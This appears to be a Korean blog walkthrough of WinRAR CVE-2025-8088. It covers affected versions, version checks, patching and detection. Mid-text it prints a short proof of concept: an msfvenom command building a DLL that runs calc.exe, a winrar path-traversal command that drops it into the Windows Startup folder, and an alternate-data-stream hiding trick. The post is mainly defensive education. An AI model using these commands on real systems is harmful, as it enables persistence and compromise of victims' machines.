
WinRAR CVE-2025-8088을 발견, 패치, 보안 강화하는 과정을 실습 해커의 시각으로 흥미롭게 풀어낸 워크스루입니다.
WinRAR — 모두가 설치했지만 아무도 업데이트하지 않는 먼지 쌓인 고전 — 에게 고심각도 제로데이인 CVE-2025-8088이 적발되었습니다.
CISA는 이를 Known Exploited Vulnerabilities 카탈로그에 등록했으며, 연방 기관의 패치 기한을 2025년 9월 2일로 설정했습니다. 이는 단순한 이론이 아닙니다 — 실제 공격이 발생하고 있습니다.
..\Startup\evil.dll영향을 받는 버전: Windows용 WinRAR (≤7.12), UnRAR.dll, Portable UnRAR 안전한 버전: Linux, Unix, Android 빌드.
당황하거나 해커 흉내를 내기 전에 버전을 확인하세요.
도움말 → WinRAR 정보winget list WinRAR
(또는 설치 디렉토리에서 winrar.exe 실행)
UnRAR.dll 우클릭 → 속성 → 자세히.이 글을 쓰기 시작했을 때 저는 7.10을 사용 중이었습니다 — 네, 딱 좋은 표적이었죠 🗿🐔🍗.
도움말 → WinRAR 정보 → 7.13 이상이어야 합니다.UnRAR.dll이 있다면 교체하세요.WinRAR은 자동 업데이트되지 않습니다 — 캘린더 알림을 설정하고 정적인 표적이 되지 마세요.
추신: 여기 내 배경화면 자랑은 무시하세요 — 좀 과시하고 싶었어요! 😏
%TEMP% 및 시작 폴더에 드롭.⚠ 면책: 이 정보는 교육 및 승인된 보안 테스트 전용입니다. 무분별하게 사용하지 마세요 🗿.
msfvenom -p windows/x64/exec CMD=calc.exe -f dll > evil.dll
winrar a -ep -ap"\\..\\..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" payload.rar evil.dll
type evil.dll > legit.txt:evil.dll
짜잔 — evil.dll이 시작 폴더에 들어갑니다. 다음 재부팅? Hello calc.exe.
패치 → WinRAR 7.13+
다음 경로에서 의심스러운 .dll 또는 .lnk 찾기:
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup%TEMP%ADS 모니터링:
streams.exe -s C:\
IDS/IPS 규칙: ..\ 시퀀스가 포함된 RAR 플래그 지정.
Nessus/Qualys 플러그인 이미 배포됨.
이번 취약점은 "언젠가 발생할지도" 모르는 결함이 아니었습니다 — 공개 전에 이미 무기화되었습니다. 여전히 7.10을 사용 중이라면 (이 글을 쓸 때 저처럼) 지금 패치하세요. 만약 레드팀 쪽에 있다면, 이 사례를 오래된 도구가 새로운 공격 벡터가 되는 방법에 대한 사례 연구로 활용하세요.